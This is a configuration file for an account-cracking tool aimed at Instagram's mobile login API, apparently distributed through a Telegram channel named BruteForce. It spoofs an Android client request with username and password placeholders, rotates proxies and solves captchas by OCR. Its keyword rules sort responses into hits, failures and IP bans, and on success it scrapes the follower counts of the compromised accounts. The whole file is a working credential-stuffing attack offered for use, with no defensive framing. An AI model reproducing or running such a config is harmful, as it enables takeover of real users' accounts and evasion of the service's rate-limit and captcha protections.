[Settings]
SiteURL=https://i.instagram.com/api/Telegram.me/BruteForce
Timeout=20
WaitBot=0
ResolveHost=0
ComboFilter=0
UsernameStart=6
UsernameEnd=8
PasswordStart=6
PasswordEnd=8
ComboMode=0
Letters=0
Digits=0
Alpha=0
Email=0
LowerUpper=0
LetterDigit=0
SpeciaChar=0
PasswordLetters=0
PasswordDigits=0
PasswordAlpha=0
PasswordEmail=0
PasswordLowerUpper=0
PasswordLetterDigit=0
PasswordSpeciaChar=0
EmailFilter=0
EmailMode=0
ProxyActivate=80
ProxyRatio=3
ProxyCombo=0
WaitTime=0
BanWindowWidth=0
BanWindowProxies=0
BanWindowRatio=0
blnNoProxies=0
RequestMethod=2
Referer=2
HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|Referer: https://i.instagram.com/api/Telegram.me/BruteForce|User-Agent: Instagram 27.0.0.11.97 Android (25/7.1.1; 480dpi; 1080x1776; motorola; Moto G (5S) Plus; sanders_nt; qcom; pt_BR)|Host: <HOST>|Pragma: no-cache|Connection: keep-alive|
POSTData=signed_body=1294ab42d19afeed941e275db1ec89f0b74639f06397c8ee90b80619db99c7a3.{"adid":"ab8fb403-d2a8-4ba9-b76e-cd0819cacbd8","country_codes":"[{\"country_code\":\"1\",\"source\":[\"default\"]}]","device_id":"android-ba66962ec7e5c154","google_tokens":"[]","guid":"386ff51c-a844-4017-9382-f19782f0ebae","login_attempt_count":0,"password":"<PASS>","phone_id":"cd6dfac6-2ccd-4f79-a53b-f762f4c08693","username":"<USER>"}

[Form]
IAParse=0
blnBasic=0
Action=https://i.instagram.com/api/v1/accounts/login/
Username=
Password=
Email=
CustomData=
NoIndex=
AddData=signed_body=1294ab42d19afeed941e275db1ec89f0b74639f06397c8ee90b80619db99c7a3.{"adid":"ab8fb403-d2a8-4ba9-b76e-cd0819cacbd8","country_codes":"[{\"country_code\":\"1\",\"source\":[\"default\"]}]","device_id":"android-ba66962ec7e5c154","google_tokens":"[]","guid":"386ff51c-a844-4017-9382-f19782f0ebae","login_attempt_count":0,"password":"<PASS>","phone_id":"cd6dfac6-2ccd-4f79-a53b-f762f4c08693","username":"<USER>"}
Cookie=
IAction=-1
IUser=-1
IPass=-1
IEmail=-2
ICaptcha=-1
ReqReferer=
ReqCookie=
AjaxURL=
AjaxPOSTData=
AjaxData=
AjaxParsingCode=
RefData=
ParsingCode=
FormRedirectUrl=https://www.instagram.com/<USER>
RedPostData=
LoginPostData=
RedKeys=<Source>||checkpoint_challenge_required;<Source>||logged_in_user
DataDesc=Followers&Following
CaptureParsingCode=edge_followed_by":{"count":|},"|#00|#00|0|#00|#00|0&edge_follow":{"count":|}|#00|#00|0|#00|  #7C Telegram Channel: @BruteForce|0
RefreshSession=0
RefreshCookie=0
IAMethod=2
POSTMethod=2
RedMethod=1
LoginMethod=1
AjaxHeader=0
FormHeader=0
RedHeader=0
LoginHeader=0
ImageAfterAjax=0
FollowRedirectsOnIA=0
FollowRedirectsOnRed=1

[Ajax]
Variables=
PostElements2=
RedURL=

[OCR]
OCRMode=0
URLMode=0
ImageURLID=||
Captcha=
OCRKey=
RefreshCaptcha=0
blnContrast=0
blnBrightness=0
blnSaturation=0
blnThreshold=0
blnInvert=0
blnNoise=0
blnIsolate=0
blnResize=0
blnBorder=0
blnCharExtract=0
blnRemoveColors=0
blnStringFilter=0
blnLetter=1
blnDigits=1
blnBlur=0
blnReconstruct=0
blnLower=0
blnUpper=0
blnRemoveLines=0
blnMultiChar=0
blnPalette=0
blnCharResize=0
blnCharSubExtraction=0
blnGif=0
blnCompute=0
blnBorderPre=0
Contrast=0
Brightness=0
Saturation=0
Threshold=0
Noise=1
Isolate=1
Resize=2
BorderLeft=0
BorderTop=0
BorderRight=0
BorderBottom=0
CharExtractMinBlack=0
CharExtractMaxBlack=1
CharExtractMinWidth=1
CharRotateMax=0
CharRotateSteps=5
MinLength=1
MaxLength=10
BlurRadius=1
CharExtractMaxWidth=33
CharWidthMinBlack=2
CharSpace=1
Range=0
InvertDensity=0
InvertLength=20
LineCurvatureMax=4
LineWidthMax=13
CharResize=1
CharHeight=13
GifStart=2
GifOffset=2
BorderLeftPre=0
BorderTopPre=0
BorderRightPre=0
BorderBottomPre=0
CharBorderH=5
CharBorderV=5
CharRotateBorder=5
CharExtractMinHeight=1
VerticalRejoin=30
CharExclude=
SpecialChars=
Colors=
Colors2=
Lines=Min Length: 2, Max Width: 5, Horizzontal
Language=eng

[Keywords]
HeaderFail=
HeaderSuccess=
HeaderBan=
HeaderRetry=
SourceFail=bad_password;invalid_user;unusable_password;The username you entered doesn't appear to belong to an account. Please check your username and try again.;invalid_credentials
SourceSuccess=logged_in_user;checkpoint_challenge_required;edge_followed_by
SourceBan=rate_limit_error;ip_block
SourceRetry=sentry_block
EnableHeaderFail=0
EnableHeaderSuccess=0
EnableHeaderBan=0
EnableHeaderRetry=0
EnableSourceFail=1
EnableSourceSuccess=1
EnableSourceBan=1
EnableSourceRetry=1
EnableGlobalSourceRetry=0

[Fake]
AfterFP=1
FollowRedirect=1
EnableConHits=1
Success=3
ConHits=1
EnableConLength=0
SourceTags=1
ConLength=200
blnSuccess=1
SuccessRetries=2
blnForbToOK=0
ForbToOkLength=1000
blnBadOcrCode=0
BadOcrCodeRetries=3
blnCompleteNot=1
HTTPFollow=1
blnProcessErrors=1
blnInvalidPath=1
UserField=0

